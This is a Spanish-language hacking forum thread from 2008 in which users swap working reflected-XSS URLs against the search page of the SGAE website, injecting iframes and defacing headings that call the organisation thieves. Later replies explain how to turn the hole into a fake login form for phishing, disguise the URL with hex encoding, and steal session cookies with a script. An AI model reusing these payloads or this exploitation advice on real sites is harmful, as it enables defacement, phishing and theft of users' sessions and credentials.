|
Título: XSS en la web de la SGAE Publicado por: caosdoar en 2 Febrero 2008, 00:56 am El tema es viejo, lo comenté en su momento en meneame.net e incluso se usó para realizar un google bombing para poner a la sgae en el primer puesto con la palabra "ladrones". Pero aun así siguen teniendo el mismo problema.
Un ejemplo *muy sencillo* de lo que se puede hacer... http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ciframe%20src=%22http://www.elhacker.net%22%20width=%22460%22%20height=%22300%22%3ELadrones%3C/iframe%3E (http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ciframe%20src=%22http://www.elhacker.net%22%20width=%22460%22%20height=%22300%22%3ELadrones%3C/iframe%3E) Título: Re: XSS en la web de la SGAE Publicado por: marlon_agz en 2 Febrero 2008, 01:02 am jua que buena con iframe :xD
salu2 Título: Re: XSS en la web de la SGAE Publicado por: -sagitari- en 2 Febrero 2008, 01:04 am El mismo bug lo tienen muchas otras webs importantes y conocidas, por ejemplo la web de la real academia española (RAE).. XSS hay por muchhhhhhhísimas webs!
http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=<h1><font color=red>SOIS UNOS LADRONES etc. salu2 no hay que darle mayor importancia, Título: Re: XSS en la web de la SGAE Publicado por: caosdoar en 2 Febrero 2008, 01:08 am Yo creo que tiene su cierta importancia.
Supongamos que creamos un formulario de login falso a través de ese error de XSS. Cuelgo la URL para acceder a ella en una web y le doy tiempo a google para que la indexe, si alguien entrase a través de google a esa dirección podría revelar sus datos a otra persona. Y todo el código estaría en google/sgae. Título: Re: XSS en la web de la SGAE Publicado por: marlon_agz en 2 Febrero 2008, 01:10 am apoco no es divertido ??? :xD
bueno me resulta comico ver cosas como esas jejeje salu2 Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje. ya sabia que alguien le encontraria algun beneficio :xD salu2 yo solo lo veo divertido xD Título: Re: XSS en la web de la SGAE Publicado por: Azielito en 6 Febrero 2008, 18:32 pm mas info:
http://en.wikipedia.org/wiki/Cross-site_request_forgery Título: Re: XSS en la web de la SGAE Publicado por: anikillador en 12 Febrero 2008, 14:30 pm http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ciframe%20src=%22http://www.zonalibre.org/blog/Carpanta/archives/imagenes/no-sgae.gif%22%20width=%22460%22%20height=%22300%22%3ELadrones%3C/iframe%3E
jeejjejejjejeje Título: Re: XSS en la web de la SGAE Publicado por: AlbertoBSD en 12 Febrero 2008, 15:00 pm Podrian dejar de poner el mismo link modificado :huh: Ya enfadaron con tanto Xss, abundan en la web, si va a hacer algo haganlo y no le digan a nadie.
Not Trust Anybody Título: Re: XSS en la web de la SGAE Publicado por: pana88 en 4 Marzo 2008, 06:48 am el mio jejej por joder ...
http://www.sgae.es/search/search-es.jsp?idioma=es&select=es&texto=%3Ciframe+name%3D%22prueba%22+src%3D%22http%3A%2F%2Fwww.lapachorra.com.ar%22++width%3D%221024%22+height%3D%22768%22+%3E una pregunta ... que ventajas puedo obtener para mi ? por que hasta ahora solo vi cosas nomas nunca una web hackeada con eso Título: Re: XSS en la web de la SGAE Publicado por: Snap90210 en 4 Marzo 2008, 14:40 pm el mio jejej por joder ... una pregunta ... que ventajas puedo obtener para mi ? por que hasta ahora solo vi cosas nomas nunca una web hackeada con eso Puedes modificar la URL, de tal modo que parezca no modificada, esto puedes hacerlo usando "Hexadecimal Characters Code" o etc. Luego si el sitio usa session cookies, puedes robarselas a tu "victima" mediante un simple script en PHP y JS o lo q sea que quieras usar que te sirva para el proposito que tengas. Otro ataque seria mediante ingenieria social, mandar la URL a una "victima" la cual se encuentre con un Iframe (o lo que sea) q concuerde con el diseño de la web, la cual le haga un prompt de User/Password, con poco conocimiento de html/php lo puedes hacer muy facil. Como ves las opciones son muchas .. solo tienes que imaginarlas. |